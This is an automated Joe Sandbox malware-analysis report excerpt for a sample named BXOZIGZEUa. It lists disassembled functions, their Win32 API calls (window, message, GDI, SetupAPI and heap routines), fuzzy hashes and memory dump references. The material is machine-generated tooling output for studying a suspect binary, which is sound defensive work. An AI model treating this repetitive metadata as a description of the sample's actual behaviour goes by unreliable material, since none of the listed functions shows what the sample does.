Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Rect$InflateInvalidateUpdate
String ID:
API String ID: 2730120201-0
Opcode ID: 0e4a256d883960945dc1ec5f37965150ce9b3ed3b041c20a414cc6ecd8e0a35a
Instruction ID: a2bede6bea418fdf457459d25d929ac23c6384cd01ea5d52c851d693e82dd2e9
Opcode Fuzzy Hash: 0e4a256d883960945dc1ec5f37965150ce9b3ed3b041c20a414cc6ecd8e0a35a
Instruction Fuzzy Hash: A731E4322002059BDB01EF65C988FEA7BB9FF88344F1540A5ED49DF2A6DB35E805CB60

Function 005229B7 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00522A10
GetWindowRect.USER32(?,?), ref: 00522A33
PtInRect.USER32(?,?,?), ref: 00522A3F
GetWindowRect.USER32(?,?), ref: 00522A5D
PtInRect.USER32(?,?,?), ref: 00522A6A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window
String ID:
API String ID: 924285169-0
Opcode ID: 43e0e0dd607900fb5950e088bdbcd23ce95db9641fcb25962d12f3916ae15f25
Instruction ID: f39726bd7d0738a9343b8bd51428469cf5f4f1a438cba58e700025ddea94ef97
Opcode Fuzzy Hash: 43e0e0dd607900fb5950e088bdbcd23ce95db9641fcb25962d12f3916ae15f25
Instruction Fuzzy Hash: 983107B9A10229EFCB10DFA9D8849EEBBF9FF4D710B10406AE405E3261D7759940CFA1

Function 004E8693 Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004E86B6
GetWindowRect.USER32(00000000,?), ref: 004E86E3
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 004E8708
GetWindow.USER32(?,00000005), ref: 004E8711
ScrollWindow.USER32(?,?,?,?,?), ref: 004E872C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$RectScrollVisible
String ID:
API String ID: 2639402888-0
Opcode ID: b2dd85b0b5c684c4c6f5a706977bb6d443f2345b510138ddda8a1d51174353f4
Instruction ID: 848020f2e2d2f3d9e3fe32d0f548ae04013ca8e836608cb092561f2715cad48b
Opcode Fuzzy Hash: b2dd85b0b5c684c4c6f5a706977bb6d443f2345b510138ddda8a1d51174353f4
Instruction Fuzzy Hash: 02215771900208AFCF11DFA6CC89DAFBBB9FF98301B20440AF64AA6211DB359940DB61

Function 004EA6E4 Relevance: 7.6, APIs: 5, Instructions: 80windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004EA6EE
GetTopWindow.USER32(00000000), ref: 004EA713
GetDlgCtrlID.USER32(00000000), ref: 004EA725
SendMessageW.USER32(?,00000087,00000000,00000000), ref: 004EA781
GetWindow.USER32(00000000,00000002), ref: 004EA7C1

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$CtrlH_prolog3MessageSend
String ID:
API String ID: 849854284-0
Opcode ID: a6bc674ac37077711147b150ab2e3af54e03751d014c8ed25033df643d50a27c
Instruction ID: deb03ab68f2389c2edbc080b40afaff2a33c342c8216c30c43e65d28eec55afc
Opcode Fuzzy Hash: a6bc674ac37077711147b150ab2e3af54e03751d014c8ed25033df643d50a27c
Instruction Fuzzy Hash: 6D21D071901254AADF24EBA2CC85EBEBA75FF55301F20415BF451E2290DB38AE44CB6A

Function 004D2A40 Relevance: 7.6, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

SetupGetStringFieldW.SETUPAPI(?,00000001,00000000,00000000,00000000), ref: 004D2A54
GetLastError.KERNEL32(?,?,004D2172,?), ref: 004D2A5E
SetupGetStringFieldW.SETUPAPI(?,00000001,?,00000000,00000000), ref: 004D2AA4
_wcsnlen.LIBCMT ref: 004D2ACB

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: FieldSetupString$ErrorLast_wcsnlen
String ID:
API String ID: 2547521842-0
Opcode ID: 1f3a6367943c173c4630aba13c35eda614c08dcb90d90e35d205d6da0246986c
Instruction ID: 3b56be69f0888489ad1ca41f93d061d84c6077162b2d3e462222b586172c7672
Opcode Fuzzy Hash: 1f3a6367943c173c4630aba13c35eda614c08dcb90d90e35d205d6da0246986c
Instruction Fuzzy Hash: 88215B71700105AFDB24CFA9DD98E3AB7E9EFA8345F10016EE509C7350EA75AD41CA68

Function 00516D91 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

SendMessageW.USER32(?,00000086,00000001,00000000), ref: 00516DF8
SendMessageW.USER32(?,00000086,00000000,00000000), ref: 00516E0F
GetDesktopWindow.USER32 ref: 00516E13
SendMessageW.USER32(00000000,0000036D,0000000C,00000000), ref: 00516E34
GetWindow.USER32(00000000), ref: 00516E39

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: b9b4da6a1f68a12d89a6eda850993984b6f7296db949c1ef7e801dc6b703759f
Instruction ID: c883d9b82c44cce9aee7c7f6d52670c65cbba81b5cbb42eedd16032cee870ff3
Opcode Fuzzy Hash: b9b4da6a1f68a12d89a6eda850993984b6f7296db949c1ef7e801dc6b703759f
Instruction Fuzzy Hash: FA11EF3534175167FB312B22CC86FEB3E58FF84BA4F240229FA01991E1CEA6D8819694

Function 0052144F Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00521456
DestroyMenu.USER32(?,00000004,005218A4), ref: 00521492
IsWindow.USER32(?), ref: 005214A3
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 005214B7
~_Task_impl.LIBCPMT ref: 00521530

Part of subcall function 0057B6DD: GetParent.USER32(?), ref: 0057B743

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: DestroyH_prolog3MenuMessageParentSendTask_implWindow
String ID:
API String ID: 1857064102-0
Opcode ID: a5f83fa2ab1a4ab034e163c7c47e934e230c1f1e9ec7154578d3fa9e6c5f47fa
Instruction ID: cc37d19bea6a9a11307c55826d3df64e53bc3da7b6ce62c91cd78c749c84b3d4
Opcode Fuzzy Hash: a5f83fa2ab1a4ab034e163c7c47e934e230c1f1e9ec7154578d3fa9e6c5f47fa
Instruction Fuzzy Hash: 0031D430501A45CFDB21EF74C559BBEBFE0BF96304F20445DE09A57281DBB92A45EB12

Function 00502EA5 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 00502EDC
GetParent.USER32(?), ref: 00502EF9
GetClientRect.USER32(?,?), ref: 00502F08
GetParent.USER32(?), ref: 00502F11
MapWindowPoints.USER32(?,?,?,00000002), ref: 00502F26

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ParentRect$ClientFillPointsWindow
String ID:
API String ID: 3058756167-0
Opcode ID: d10a40c1d700eb5b7c65898b8ec19276b91de1f44ec8dc29493e81a6b034cbf8
Instruction ID: 29f6327532a66b959af75cf084170a5e16f97aefdeb874d853aa77bdb93640b4
Opcode Fuzzy Hash: d10a40c1d700eb5b7c65898b8ec19276b91de1f44ec8dc29493e81a6b034cbf8
Instruction Fuzzy Hash: 8A212771900209AFCF00EFA5CC498BFBBB5FF49310B51456EE905A7261EB75AA05DB90

Function 0051759B Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 00517615
GlobalAddAtomW.KERNEL32(?), ref: 00517624
GlobalGetAtomNameW.KERNEL32(?,?,00000103), ref: 0051763A
GlobalAddAtomW.KERNEL32(?), ref: 00517643
SendMessageW.USER32(?,000003E4,?,?), ref: 0051766D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: a19743e76693e154ee7f783a07e4b0e94d1d6ace6bdef56400296cc6c2b3abc6
Instruction ID: b70d3d9723b369871d66a6f6a13550f1b5dd3eeee67fb695b7979a175916f317
Opcode Fuzzy Hash: a19743e76693e154ee7f783a07e4b0e94d1d6ace6bdef56400296cc6c2b3abc6
Instruction Fuzzy Hash: 81218E7190021CAADB20EF79CC48AEAB7F8FB18744F10859AE55DD7191D778AE84CB60

Function 005B4C7F Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005B4C86
SetRectEmpty.USER32(?), ref: 005B4D3B
CreateCompatibleDC.GDI32(00000000), ref: 005B4D3E
SetRectEmpty.USER32(?), ref: 005B4D5D
CreatePen.GDI32(00000000,00000001,?), ref: 005B4D68

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CreateEmptyH_prolog3Rect$CompatibleException@8Throw
String ID:
API String ID: 2318760352-0
Opcode ID: d40786d58036efc0d54b5a077e18c3c465ac4829b311ba487a0c8772e543c47f
Instruction ID: 285a2e3ee7a85fde57ab01ef8f24d395a7055312257e6ee1488be4d85b0817ef
Opcode Fuzzy Hash: d40786d58036efc0d54b5a077e18c3c465ac4829b311ba487a0c8772e543c47f
Instruction Fuzzy Hash: CF21C8B0801B44CFD761DF6AC981BAAFAE8BFA4300F10891FE1AE97211CBB46545DF55

Function 004D7180 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 004D71B2

Part of subcall function 005E8838: _setlocale.LIBCMT ref: 005E884A

_free.LIBCMT ref: 004D71C4

Part of subcall function 005CE216: HeapFree.KERNEL32(00000000,00000000,?,005D5DB2,00000000,?,005D4298,?,00000001,?,?,005D6FC6,00000018,00638280,0000000C,005D7056), ref: 005CE22C
Part of subcall function 005CE216: GetLastError.KERNEL32(00000000,?,005D5DB2,00000000,?,005D4298,?,00000001,?,?,005D6FC6,00000018,00638280,0000000C,005D7056,?), ref: 005CE23E

_free.LIBCMT ref: 004D71D7
_free.LIBCMT ref: 004D71EA
_free.LIBCMT ref: 004D71FD

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 8debc0d10902745988ad6fa00da3df8896c47a7a6caa6427cb03906d43589fa9
Instruction ID: ba3fcb0e7cbb7da1f0643957f66ad17085fea0eb82c43366531a58c2549af04e
Opcode Fuzzy Hash: 8debc0d10902745988ad6fa00da3df8896c47a7a6caa6427cb03906d43589fa9
Instruction Fuzzy Hash: 411160B2904A44ABC720DF599C06E1FFBEDEB81710F144A2BE419D3740E675E9048A52

Function 004FF3CD Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004FF3D4
GetWindowRect.USER32(?,?), ref: 004FF415
CreateRoundRectRgn.GDI32(00000000,00000000,?,?,00000004,00000004), ref: 004FF43F
SetWindowRgn.USER32(?,?,00000000), ref: 004FF455

Part of subcall function 004DDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 004DDC99

SetWindowRgn.USER32(?,00000000,00000000), ref: 004FF471

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Rect$CreateH_prolog3_H_prolog3_catch_Round
String ID:
API String ID: 4273792742-0
Opcode ID: f2a97eef91e2b0462fd5756a14de7a530762f5976a36008b0a140af2ba9cea90
Instruction ID: cdc8db34fe1126306c5fc7eeeac80d9c3adfdf15994b076b6b8c42512d09a644
Opcode Fuzzy Hash: f2a97eef91e2b0462fd5756a14de7a530762f5976a36008b0a140af2ba9cea90
Instruction Fuzzy Hash: 5811ED71900609DFDB10DFA5C8499BFFBB4FF98701F14012EE692A2260DB795905DF68

Function 004E0D9F Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?), ref: 004E0DCB
_memset.LIBCMT ref: 004E0DE9
GetWindowTextW.USER32(00000000,?,00000100), ref: 004E0E03
lstrcmpW.KERNEL32(?,?,?,?), ref: 004E0E15
SetWindowTextW.USER32(00000000,?), ref: 004E0E21

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: b68eb164353971630d206f41b6840a49820e596d025704e8c8bbafbe5084dca0
Instruction ID: e56d74e8846a42c4e798a2c20ccbc90f24fedfdec1c80c38f2273cac557f865f
Opcode Fuzzy Hash: b68eb164353971630d206f41b6840a49820e596d025704e8c8bbafbe5084dca0
Instruction Fuzzy Hash: 1E01C8B6501219A7CB10AFB59C88EAF77ACEB48751F004467F915D3201EA78DD84CBA4

Function 0055C168 Relevance: 7.6, APIs: 5, Instructions: 53threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0055C16F
EnterCriticalSection.KERNEL32(00646EB4,00000000,004FC29A,00000001), ref: 0055C1CB
__beginthread.LIBCMT ref: 0055C1E5
SetThreadPriority.KERNEL32(00000000,000000FF), ref: 0055C1FE
LeaveCriticalSection.KERNEL32(00646EB4), ref: 0055C215

Part of subcall function 004E800E: __EH_prolog3.LIBCMT ref: 004E8015

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalH_prolog3Section$EnterLeavePriorityThread__beginthread
String ID:
API String ID: 4118814795-0
Opcode ID: 8c02e229eede84fbc1dfaacb4fc1cd31f32b85a5fa7aa60ac413ff1e946da9e1
Instruction ID: 40a1e25718ca5fedc8e64d68a3bad04f74feb2ef0112751c5ebf7df445708ab4
Opcode Fuzzy Hash: 8c02e229eede84fbc1dfaacb4fc1cd31f32b85a5fa7aa60ac413ff1e946da9e1
Instruction Fuzzy Hash: 2C11C8788047119FCF249FB4DC5941A3EA1BB02B36F20171BF866862E1C634488ADB92

Function 00516BF7 Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 00516C1D
PostMessageW.USER32(?,00000367,00000000,00000000), ref: 00516C35
GetCapture.USER32 ref: 00516C37
ReleaseCapture.USER32 ref: 00516C42
PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 00516C70

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$CapturePost$PeekRelease
String ID:
API String ID: 1125932295-0
Opcode ID: 0a562c67a7719c026d6c3c7217b29a57c42d7a920062ef860f8276d44747a926
Instruction ID: e2614c83f4c367fc921566c74f82c7d22ba598c51a7913ce7df03d33cb393b86
Opcode Fuzzy Hash: 0a562c67a7719c026d6c3c7217b29a57c42d7a920062ef860f8276d44747a926
Instruction Fuzzy Hash: 6301A271201200BBEB256B35DC4AF7B7AB8FB94B18F10452EF486D2190EE74EC44DB64

Function 0052C58F Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 0052C59E
SendMessageW.USER32(?,00000366,00000000,?), ref: 0052C5BA
ClientToScreen.USER32(?,?), ref: 0052C5C7
GetWindowLongW.USER32(?,000000F0), ref: 0052C5D0
GetParent.USER32(?), ref: 0052C5DE

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

